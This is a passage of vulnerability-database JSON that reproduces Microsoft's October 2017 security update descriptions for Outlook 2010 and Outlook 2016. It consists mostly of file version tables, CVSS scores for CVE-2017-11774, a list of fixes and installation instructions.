14.0.7188| 6,458,088| 25-Aug-2017| 12:56 \nmapir.dll_1031| mapir.dll| 14.0.7157| 1,195,088| 13-Aug-2015| 09:38 \nmsmapi32.dll_0001_1031| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1031| outllibr.dll| 14.0.7188| 6,668,520| 25-Aug-2017| 12:59 \nmapir.dll_1032| mapir.dll| 14.0.7157| 1,217,104| 13-Aug-2015| 09:40 \nmsmapi32.dll_0001_1032| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1032| outllibr.dll| 14.0.7188| 6,753,000| 25-Aug-2017| 12:58 \nmapir.dll_1033| mapir.dll| 14.0.7155.5000| 1,126,576| 16-Jul-2015| 09:03 \nmsmapi32.dll_0001_1033| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1033| outllibr.dll| 14.0.7185.5000| 6,588,136| 08-Jul-2017| 11:51 \nmapir.dll_3082| mapir.dll| 14.0.7157| 1,178,704| 13-Aug-2015| 09:40 \nmsmapi32.dll_0001_3082| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_3082| outllibr.dll| 14.0.7188| 6,601,960| 25-Aug-2017| 12:59 \nmapir.dll_1061| mapir.dll| 14.0.7157| 1,124,432| 13-Aug-2015| 09:40 \nmsmapi32.dll_0001_1061| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1061| outllibr.dll| 14.0.7188| 6,604,008| 25-Aug-2017| 01:03 \nmapir.dll_1069| mapir.dll| 14.0.7157| 1,159,248| 13-Aug-2015| 09:40 \nmsmapi32.dll_0001_1069| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1069| outllibr.dll| 14.0.7188| 6,619,368| 25-Aug-2017| 12:59 \nmapir.dll_1035| mapir.dll| 14.0.7157| 1,138,768| 13-Aug-2015| 09:38 \nmsmapi32.dll_0001_1035| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1035| outllibr.dll| 14.0.7188| 6,610,152| 25-Aug-2017| 12:59 \nmapir.dll_1036| mapir.dll| 14.0.7157| 1,194,064| 13-Aug-2015| 09:38 \nmsmapi32.dll_0001_1036| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1036| outllibr.dll| 14.0.7188| 6,679,272| 25-Aug-2017| 01:01 \nmapir.dll_1037| mapir.dll| 14.0.7157| 1,083,984| 13-Aug-2015| 09:38 \nmsmapi32.dll_0001_1037| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1037| outllibr.dll| 14.0.7188| 6,569,704| 25-Aug-2017| 01:00 \nmapir.dll_1081| mapir.dll| 14.0.7157| 1,142,352| 13-Aug-2015| 09:40 \nmsmapi32.dll_0001_1081| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1081| outllibr.dll| 14.0.7188| 6,642,920| 25-Aug-2017| 01:01 \nmapir.dll_1050| mapir.dll| 14.0.7157| 1,147,984| 13-Aug-2015| 09:41 \nmsmapi32.dll_0001_1050| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1050| outllibr.dll| 14.0.7188| 6,620,392| 25-Aug-2017| 01:01 \nmapir.dll_1038| mapir.dll| 14.0.7157| 1,150,128| 13-Aug-2015| 09:42 \nmsmapi32.dll_0001_1038| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1038| outllibr.dll| 14.0.7188| 6,666,472| 25-Aug-2017| 01:02 \nenvelopr.dll_1040| envelopr.dll| 14.0.7007| 19,048| 14-Dec-2012| 10:38 \nmapir.dll_1040| mapir.dll| 14.0.7157| 1,159,760| 13-Aug-2015| 09:45 \nmsmapi32.dll_0001_1040| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1040| outllibr.dll| 14.0.7188| 6,491,880| 25-Aug-2017| 01:02 \nmapir.dll_1041| mapir.dll| 14.0.7157| 1,015,888| 13-Aug-2015| 03:42 \nmsmapi32.dll_0001_1041| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1041| outllibr.dll| 14.0.7188| 6,697,192| 24-Aug-2017| 02:53 \nmapir.dll_1087| mapir.dll| 14.0.7157| 1,140,400| 13-Aug-2015| 09:42 \nmsmapi32.dll_0001_1087| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1087| outllibr.dll| 14.0.7188| 6,657,256| 25-Aug-2017| 01:03 \nmapir.dll_1042| mapir.dll| 14.0.7157| 1,004,624| 13-Aug-2015| 09:45 \nmsmapi32.dll_0001_1042| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1042| outllibr.dll| 14.0.7188| 6,668,008| 25-Aug-2017| 01:01 \nmapir.dll_1063| mapir.dll| 14.0.7157| 1,146,448| 13-Aug-2015| 09:45 \nmsmapi32.dll_0001_1063| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1063| outllibr.dll| 14.0.7188| 6,650,600| 25-Aug-2017| 01:02 \nmapir.dll_1062| mapir.dll| 14.0.7157| 1,141,328| 13-Aug-2015| 09:45 \nmsmapi32.dll_0001_1062| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1062| outllibr.dll| 14.0.7188| 6,645,992| 25-Aug-2017| 01:03 \nmapir.dll_1044| mapir.dll| 14.0.7157| 1,128,016| 13-Aug-2015| 09:45 \nmsmapi32.dll_0001_1044| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1044| outllibr.dll| 14.0.7188| 6,595,816| 25-Aug-2017| 01:02 \nmapir.dll_1043| mapir.dll| 14.0.7157| 1,172,144| 13-Aug-2015| 09:45 \nmsmapi32.dll_0001_1043| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1043| outllibr.dll| 14.0.7188| 6,641,384| 25-Aug-2017| 01:04 \nmapir.dll_1045| mapir.dll| 14.0.7157| 1,167,440| 13-Aug-2015| 09:45 \nmsmapi32.dll_0001_1045| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1045| outllibr.dll| 14.0.7188| 6,672,104| 25-Aug-2017| 01:03 \nmapir.dll_1046| mapir.dll| 14.0.7157| 1,168,976| 13-Aug-2015| 09:46 \nmsmapi32.dll_0001_1046| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1046| outllibr.dll| 14.0.7188| 6,382,824| 25-Aug-2017| 01:05 \nmapir.dll_2070| mapir.dll| 14.0.7157| 1,177,680| 13-Aug-2015| 09:47 \nmsmapi32.dll_0001_2070| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_2070| outllibr.dll| 14.0.7188| 6,650,088| 25-Aug-2017| 01:05 \nmapir.dll_1048| mapir.dll| 14.0.7157| 1,159,760| 13-Aug-2015| 09:47 \nmsmapi32.dll_0001_1048| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1048| outllibr.dll| 14.0.7188| 6,638,312| 25-Aug-2017| 01:04 \nmapir.dll_1049| mapir.dll| 14.0.7157| 1,141,424| 13-Aug-2015| 09:47 \nmsmapi32.dll_0001_1049| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1049| outllibr.dll| 14.0.7188| 6,654,696| 25-Aug-2017| 01:06 \nmapir.dll_1051| mapir.dll| 14.0.7157| 1,158,224| 13-Aug-2015| 09:47 \nmsmapi32.dll_0001_1051| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1051| outllibr.dll| 14.0.7188| 6,661,352| 25-Aug-2017| 01:07 \nmapir.dll_1060| mapir.dll| 14.0.7157| 1,142,864| 13-Aug-2015| 09:47 \nmsmapi32.dll_0001_1060| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1060| outllibr.dll| 14.0.7188| 6,622,440| 25-Aug-2017| 01:07 \nmapir.dll_2074| mapir.dll| 14.0.7157| 1,150,544| 13-Aug-2015| 09:47 \nmsmapi32.dll_0001_2074| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_2074| outllibr.dll| 14.0.7188| 6,628,072| 25-Aug-2017| 01:06 \nmapir.dll_1053| mapir.dll| 14.0.7157| 1,129,648| 13-Aug-2015| 09:47 \nmsmapi32.dll_0001_1053| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1053| outllibr.dll| 14.0.7188| 6,592,744| 25-Aug-2017| 01:08 \nmapir.dll_1054| mapir.dll| 14.0.7157| 1,121,872| 13-Aug-2015| 12:21 \nmsmapi32.dll_0001_1054| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1054| outllibr.dll| 14.0.7188| 6,628,072| 25-Aug-2017| 01:08 \nmapir.dll_1055| mapir.dll| 14.0.7157| 1,127,504| 13-Aug-2015| 09:47 \nmsmapi32.dll_0001_1055| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1055| outllibr.dll| 14.0.7188| 6,622,952| 25-Aug-2017| 01:06 \nmapir.dll_1058| mapir.dll| 14.0.7157| 1,145,936| 13-Aug-2015| 09:47 \nmsmapi32.dll_0001_1058| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1058| outllibr.dll| 14.0.7188| 6,661,352| 25-Aug-2017| 01:08 \nmapir.dll_2052| mapir.dll| 14.0.7157| 958,032| 13-Aug-2015| 09:47 \nmsmapi32.dll_0001_2052| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_2052| outllibr.dll| 14.0.7188| 6,557,416| 25-Aug-2017| 01:08 \noutlook.hol_2052| outlook.hol| | 1,262,244| 22-Apr-2013| 09:25 \nmapir.dll_1028| mapir.dll| 14.0.7157| 960,080| 13-Aug-2015| 09:48 \nmsmapi32.dll_0001_1028| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1028| outllibr.dll| 14.0.7188| 6,549,736| 25-Aug-2017| 01:09 \n \nHow to get help and support for this security updateHelp for installing updates: [Windows Update FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>)Security solutions for IT professionals: [Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>)Help for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<https://support.microsoft.com/contactus/cu_sc_virsec_master>)Local support according to your country: [International Support](<http://support.microsoft.com>)Propose a feature or provide feedback on Office: [Office User Voice portal](<https://office.uservoice.com/>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-10T07:00:00", "type": "mskb", "title": "Description of the security update for Outlook 2010: October 10, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774"], "modified": "2017-10-10T07:00:00", "id": "KB4011196", "href": "https://support.microsoft.com/en-us/help/4011196", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-25T10:46:50", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-11774](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11774>) and [Microsoft Common Vulnerabilities and Exposures CVE-2017-11776](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11776>). \n \n**Note** To apply this security update, you must have the release version of Outlook 2016 installed on the computer.Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2016. It doesn't apply to the Office 2016 Click-to-Run editions, such as Microsoft Office 365 Home. (Determining your Office version)\n\n## Improvements and fixes\n\nThis security update contains the following improvements and fixes: \n\n\n * Outlook will not connect with MAPI/HTTP if certain HTTP headers are received by the client with unexpected type casing.\n * You occasionally experience an error when you try to access the address book.\n * When you open a recurring meeting with exceptions in Outlook 2016, the meeting details may be lost.\n * An Add-in (web extension) returns an incorrect Exchange Web Services (EWS) URL if the internal and external EWS URLs are different.\n * After you send an email message in Outlook 2016 that has an IMAP account configured, the message appears in the Drafts folder again.\n * When you forward or reply to an HTML email message that has some images in Outlook 2016, one or more attachments or inline images may be lost.\n * When you use Outlook.com to send email messages to users who are outside the service, those messages show the winmail.dat files as attachments for those recipients.\n * The Apps for Office button are no longer visible on the compose form if there are no legacy compose add-ins enabled.\n * When you open a recurring meeting that has exceptions in Online mode in Outlook 2016, the meeting body may be blank.\n * Updates the holiday information in the Outlook holiday file (Outlook.HOL) for Malaysia, Russia, Trinidad, and Tobago. To apply the change, follow these steps:\n * Install this update that contains the updated .HOL file.\n * Go to **Calendar**, and then select **View **-> **Change View** -> **List **-> **Categories**.\n * Select and delete the old holiday events that are grouped for the relevant location.\n * Select **File **-> **Options **-> **Calendar **-> **Add Holidays**, check the relevant holiday group, and then select **OK**.\n * Improves some translations for the Russian 32-bit version of Outlook 2016.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011162>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download the security update KB4011162 for the 32-bit version of Outlook 2016](<http://www.microsoft.com/download/details.aspx?familyid=982a95fa-4f1a-47f3-b862-cdc9b5a3967d>)\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download the security update KB4011162 for the 64-bit version of Outlook 2016](<http://www.microsoft.com/download/details.aspx?familyid=3155ed0b-9cd7-4336-ab64-6ce76d4cad89>)\n\n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: October 10, 2017](<https://support.microsoft.com/en-us/help/20171010>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [4011091](<http://support.microsoft.com/kb/4011091>).\n\n### File hash information\n\nPackage name| Package hash SHA 1| Package hash SHA 2 \n---|---|--- \noutlook2016-kb4011162-fullfile-x64-glb.exe| E131548EFD60A4F19B7720FEB064A3485E7A8B37| C4EC930F479931281529C373894B9E70C16FF6A0381DFE1CB887F125F4147CE6 \noutlook2016-kb4011162-fullfile-x86-glb.exe| 5D36BADCB16C2969273D537A1399D968D34AEB9C| D6F2D9B34D99C5F4EADC1117B8FBF050BDEB5FCCFD59A602E1021E7C2F1BBE46 \n \n### File information\n\nThe English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and the times may change when you perform certain operations on the files.\n\n## \n\n__\n\nFor all supported x86-based versions of Outlook 2016\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \noutlook.hol_1025| outlook.hol| | 1300622| 13-Sep-17| 11:32 \noutlook.hol_1026| outlook.hol| | 1445192| 13-Sep-17| 11:32 \noutlook.hol_1029| outlook.hol| | 1414392| 13-Sep-17| 11:32 \noutlook.hol_1030| outlook.hol| | 1323070| 13-Sep-17| 11:32 \noutlook.hol_1031| outlook.hol| | 1366948| 13-Sep-17| 11:32 \noutlook.hol_1032| outlook.hol| | 1551916| 13-Sep-17| 11:32 \noutlook.hol_3082| outlook.hol| | 1454216| 13-Sep-17| 11:32 \noutlook.hol_1061| outlook.hol| | 1466058| 13-Sep-17| 11:32 \noutlook.hol_1035| outlook.hol| | 1449258| 13-Sep-17| 11:32 \noutlook.hol_1036| outlook.hol| | 1414270| 13-Sep-17| 11:32 \noutlook.hol_1037| outlook.hol| | 1279682| 13-Sep-17| 11:32 \noutlook.hol_1081| outlook.hol| | 1285370| 13-Sep-17| 11:32 \noutlook.hol_1050| outlook.hol| | 1323016| 13-Sep-17| 11:32 \noutlook.hol_1038| outlook.hol| | 1415312| 13-Sep-17| 11:32 \noutlook.hol_1057| outlook.hol| | 1386564| 13-Sep-17| 11:32 \noutlook.hol_1040| outlook.hol| | 1474676| 13-Sep-17| 11:32 \noutlook.hol_1041| outlook.hol| | 905776| 13-Sep-17| 11:32 \noutlook.hol_1087| outlook.hol| | 1426976| 13-Sep-17| 11:32 \noutlook.hol_1042| outlook.hol| | 924948| 13-Sep-17| 11:32 \noutlook.hol_1063| outlook.hol| | 1518110| 13-Sep-17| 11:32 \noutlook.hol_1062| outlook.hol| | 1537854| 13-Sep-17| 11:32 \noutlook.hol_1086| outlook.hol| | 1368974| 13-Sep-17| 11:32 \noutlook.hol_1044| outlook.hol| | 1402548| 13-Sep-17| 11:32 \noutlook.hol_1043| outlook.hol| | 1442834| 13-Sep-17| 11:32 \noutlook.hol_1045| outlook.hol| | 1515844| 13-Sep-17| 11:32 \noutlook.hol_1046| outlook.hol| | 1450584| 13-Sep-17| 11:32 \noutlook.hol_2070| outlook.hol| | 1485718| 13-Sep-17| 11:32 \noutlook.hol_1048| outlook.hol| | 1436690| 13-Sep-17| 11:32 \noutlook.hol_1049| outlook.hol| | 1426946| 13-Sep-17| 11:32 \noutlook.hol_1051| outlook.hol| | 1410664| 13-Sep-17| 11:32 \noutlook.hol_1060| outlook.hol| | 1350228| 13-Sep-17| 11:32 \noutlook.hol_2074| outlook.hol| | 1335562| 13-Sep-17| 11:32 \noutlook.hol_9242| outlook.hol| | 1343906| 13-Sep-17| 11:32 \noutlook.hol_1053| outlook.hol| | 1322670| 13-Sep-17| 11:32 \noutlook.hol_1054| outlook.hol| | 1390994| 13-Sep-17| 11:32 \noutlook.hol_1055| outlook.hol| | 1348932| 13-Sep-17| 11:32 \noutlook.hol_1058| outlook.hol| | 1530840| 13-Sep-17| 11:32 \noutlook.hol_1066| outlook.hol| | 1639200| 13-Sep-17| 11:32 \noutlook.hol_2052| outlook.hol| | 805796| 13-Sep-17| 11:32 \noutlook.hol_1028| outlook.hol| | 816268| 13-Sep-17| 11:32 \nmapir.dll_1025| mapir.dll| 16.0.4483.1000| 1251040| 13-Sep-17| 11:32 \noutllibr.dll_1025| outllibr.dll| 16.0.4570.1000| 7502568| 13-Sep-17| 11:32 \nmapir.dll_1026| mapir.dll| 16.0.4483.1000| 1318112| 13-Sep-17| 11:32 \noutllibr.dll_1026| outllibr.dll| 16.0.4570.1000| 7568616| 13-Sep-17| 11:32 \nmapir.dll_1029| mapir.dll| 16.0.4483.1000| 1292512| 13-Sep-17| 11:32 \noutllibr.dll_1029| outllibr.dll| 16.0.4570.1000| 7585512| 13-Sep-17| 11:32 \nmapir.dll_1030| mapir.dll| 16.0.4483.1000| 1297632| 13-Sep-17| 11:32 \noutllibr.dll_1030| outllibr.dll| 16.0.4570.1000| 7513320| 13-Sep-17| 11:32 \nmapir.dll_1031| mapir.dll| 16.0.4483.1000| 1346272| 13-Sep-17| 11:32 \noutllibr.dll_1031| outllibr.dll| 16.0.4570.1000| 7604456| 13-Sep-17| 11:32 \nmapir.dll_1032| mapir.dll| 16.0.4483.1000| 1368288| 13-Sep-17| 11:32 \noutllibr.dll_1032| outllibr.dll| 16.0.4570.1000| 7634152| 13-Sep-17| 11:32 \nmapir.dll_3082| mapir.dll| 16.0.4483.1000| 1334496| 13-Sep-17| 11:32 \noutllibr.dll_3082| outllibr.dll| 16.0.4570.1000| 7555816| 13-Sep-17| 11:32 \nmapir.dll_1061| mapir.dll| 16.0.4483.1000| 1276640| 13-Sep-17| 11:32 \noutllibr.dll_1061| outllibr.dll| 16.0.4570.1000| 7502056| 13-Sep-17| 11:32 \nmapir.dll_1035| mapir.dll| 16.0.4483.1000| 1291488| 13-Sep-17| 11:32 \noutllibr.dll_1035| outllibr.dll| 16.0.4570.1000| 7522024| 13-Sep-17| 11:32 \nmapir.dll_1036| mapir.dll| 16.0.4483.1000| 1346784| 13-Sep-17| 11:32 \noutllibr.dll_1036| outllibr.dll| 16.0.4570.1000| 7594216| 13-Sep-17| 11:32 \nmapir.dll_1037| mapir.dll| 16.0.4483.1000| 1237216| 13-Sep-17| 11:32 \noutllibr.dll_1037| outllibr.dll| 16.0.4570.1000| 7462120| 13-Sep-17| 11:32 \nmapir.dll_1081| mapir.dll| 16.0.4483.1000| 1295072| 13-Sep-17| 11:32 \noutllibr.dll_1081| outllibr.dll| 16.0.4570.1000| 7578856| 13-Sep-17| 11:32 \nmapir.dll_1050| mapir.dll| 16.0.4483.1000| 1301216| 13-Sep-17| 11:32 \noutllibr.dll_1050| outllibr.dll| 16.0.4570.1000| 7528680| 13-Sep-17| 11:32 \nmapir.dll_1038| mapir.dll| 16.0.4483.1000| 1305312| 13-Sep-17| 11:32 \noutllibr.dll_1038| outllibr.dll| 16.0.4570.1000| 7592168| 13-Sep-17| 11:32 \nmapir.dll_1057| mapir.dll| 16.0.4483.1000| 1291488| 13-Sep-17| 11:32 \noutllibr.dll_1057| outllibr.dll| 16.0.4570.1000| 7506152| 13-Sep-17| 11:32 \nmapir.dll_1040| mapir.dll| 16.0.4483.1000| 1321184| 13-Sep-17| 11:32 \noutllibr.dll_1040| outllibr.dll| 16.0.4570.1000| 7547624| 13-Sep-17| 11:32 \nmapir.dll_1041| mapir.dll| 16.0.4549.1000| 1170656| 13-Sep-17| 11:32 \noutllibr.dll_1041| outllibr.dll| 16.0.4570.1000| 7518952| 13-Sep-17| 11:32 \nmapir.dll_1087| mapir.dll| 16.0.4483.1000| 1294560| 13-Sep-17| 11:32 \noutllibr.dll_1087| outllibr.dll| 16.0.4570.1000| 7590120| 13-Sep-17| 11:32 \nmapir.dll_1042| mapir.dll| 16.0.4483.1000| 1162464| 13-Sep-17| 11:32 \noutllibr.dll_1042| outllibr.dll| 16.0.4570.1000| 7498984| 13-Sep-17| 11:32 \nmapir.dll_1063| mapir.dll| 16.0.4483.1000| 1299680| 13-Sep-17| 11:32 \noutllibr.dll_1063| outllibr.dll| 16.0.4570.1000| 7560936| 13-Sep-17| 11:32 \nmapir.dll_1062| mapir.dll| 16.0.4483.1000| 1292512| 13-Sep-17| 11:32 \noutllibr.dll_1062| outllibr.dll| 16.0.4570.1000| 7551720| 13-Sep-17| 11:32 \nmapir.dll_1086| mapir.dll| 16.0.4483.1000| 1294048| 13-Sep-17| 11:32 \noutllibr.dll_1086| outllibr.dll| 16.0.4570.1000| 7514856| 13-Sep-17| 11:32 \nmapir.dll_1044| mapir.dll| 16.0.4483.1000| 1280736| 13-Sep-17| 11:32 \noutllibr.dll_1044| outllibr.dll| 16.0.4570.1000| 7503592| 13-Sep-17| 11:32 \nmapir.dll_1043| mapir.dll| 16.0.4483.1000| 1325792| 13-Sep-17| 11:32 \noutllibr.dll_1043| outllibr.dll| 16.0.4570.1000| 7551208| 13-Sep-17| 11:32 \nmapir.dll_1045| mapir.dll| 16.0.4483.1000| 1319648| 13-Sep-17| 11:32 \noutllibr.dll_1045| outllibr.dll| 16.0.4570.1000| 7591656| 13-Sep-17| 11:32 \nmapir.dll_1046| mapir.dll| 16.0.4561.1000| 1317088| 13-Sep-17| 11:32 \noutllibr.dll_1046| outllibr.dll| 16.0.4588.1000| 7479016| 13-Sep-17| 11:32 \nmapir.dll_2070| mapir.dll| 16.0.4483.1000| 1328352| 13-Sep-17| 11:32 \noutllibr.dll_2070| outllibr.dll| 16.0.4570.1000| 7553256| 13-Sep-17| 11:32 \nmapir.dll_1048| mapir.dll| 16.0.4483.1000| 1309408| 13-Sep-17| 11:32 \noutllibr.dll_1048| outllibr.dll| 16.0.4570.1000| 7590632| 13-Sep-17| 11:32 \nmapir.dll_1049| mapir.dll| 16.0.4483.1000| 1296608| 13-Sep-17| 11:32 \noutllibr.dll_1049| outllibr.dll| 16.0.4600.1000| 7555816| 14-Sep-17| 01:09 \nmapir.dll_1051| mapir.dll| 16.0.4483.1000| 1308896| 13-Sep-17| 11:32 \noutllibr.dll_1051| outllibr.dll| 16.0.4570.1000| 7600872| 13-Sep-17| 11:32 \nmapir.dll_1060| mapir.dll| 16.0.4483.1000| 1295072| 13-Sep-17| 11:32 \noutllibr.dll_1060| outllibr.dll| 16.0.4570.1000| 7544040| 13-Sep-17| 11:32 \nmapir.dll_2074| mapir.dll| 16.0.4444.1000| 1302752| 13-Sep-17| 11:32 \noutllibr.dll_2074| outllibr.dll| 16.0.4561.1000| 7538920| 13-Sep-17| 11:32 \nmapir.dll_9242| mapir.dll| 16.0.4483.1000| 1302752| 13-Sep-17| 11:32 \noutllibr.dll_9242| outllibr.dll| 16.0.4570.1000| 7539432| 13-Sep-17| 11:32 \nmapir.dll_1053| mapir.dll| 16.0.4483.1000| 1285344| 13-Sep-17| 11:32 \noutllibr.dll_1053| outllibr.dll| 16.0.4570.1000| 7510752| 13-Sep-17| 11:32 \nmapir.dll_1054| mapir.dll| 16.0.4483.1000| 1274080| 13-Sep-17| 11:32 \noutllibr.dll_1054| outllibr.dll| 16.0.4570.1000| 7542504| 13-Sep-17| 11:32 \nmapir.dll_1055| mapir.dll| 16.0.4483.1000| 1280224| 13-Sep-17| 11:32 \noutllibr.dll_1055| outllibr.dll| 16.0.4570.1000| 7570152| 13-Sep-17| 11:32 \nmapir.dll_1058| mapir.dll| 16.0.4483.1000| 1299680| 13-Sep-17| 11:32 \noutllibr.dll_1058| outllibr.dll| 16.0.4570.1000| 7561960| 13-Sep-17| 11:32 \nmapir.dll_1066| mapir.dll| 16.0.4483.1000| 1289440| 13-Sep-17| 11:32 \noutllibr.dll_1066| outllibr.dll| 16.0.4570.1000| 7579880| 13-Sep-17| 11:32 \nmapir.dll_2052| mapir.dll| 16.0.4483.1000| 1118432| 13-Sep-17| 11:32 \noutllibr.dll_2052| outllibr.dll| 16.0.4570.1000| 7423208| 13-Sep-17| 11:32 \nmapir.dll_1028| mapir.dll| 16.0.4483.1000| 1121504| 13-Sep-17| 11:32 \noutllibr.dll_1028| outllibr.dll| 16.0.4570.1000| 7428832| 13-Sep-17| 11:32 \nintldate.dll_0001| intldate.dll| 16.0.4549.1000| 109824| 12-Sep-17| 10:28 \noutlook.hol_1033| outlook.hol| | 1335562| 12-Sep-17| 10:27 \nomsmain.dll| omsmain.dll| 16.0.4588.1000| 753416| 12-Sep-17| 10:28 \nomsxp32.dll| omsxp32.dll| 16.0.4588.1000| 261416| 12-Sep-17| 10:28 \nmapir.dll_1033| mapir.dll| 16.0.4444.1000| 1280736| 12-Sep-17| 10:27 \noutllibr.dll_1033| outllibr.dll| 16.0.4561.1000| 7492328| 12-Sep-17| 10:27 \ncnfnot32.exe_0004| cnfnot32.exe| 16.0.4498.1000| 176320| 12-Sep-17| 10:28 \ncontab32.dll| contab32.dll| 16.0.4600.1000| 153336| 14-Sep-17| 01:00 \ndlgsetp.dll| dlgsetp.dll| 16.0.4573.1000| 109800| 12-Sep-17| 10:28 \nemsmdb32.dll_0005| emsmdb32.dll| 16.0.4600.1000| 4323712| 14-Sep-17| 01:00 \nenvelope.dll| envelope.dll| 16.0.4600.1000| 189712| 14-Sep-17| 01:00 \nexsec32.dll_0001| exsec32.dll| 16.0.4600.1000| 338088| 14-Sep-17| 01:00 \nmapiph.dll| mapiph.dll| 16.0.4498.1000| 332616| 12-Sep-17| 10:28 \nmimedir.dll| mimedir.dll| 16.0.4600.1000| 446144| 14-Sep-17| 01:00 \nmspst32.dll_0004| mspst32.dll| 16.0.4600.1000| 1686888| 14-Sep-17| 01:00 \nolmapi32.dll| olmapi32.dll| 16.0.4600.1000| 4785408| 14-Sep-17| 01:00 \noutlmime.dll| outlmime.dll| 16.0.4600.1000| 611608| 14-Sep-17| 01:00 \noutlook.exe| outlook.exe| 16.0.4600.1000| 23187144| 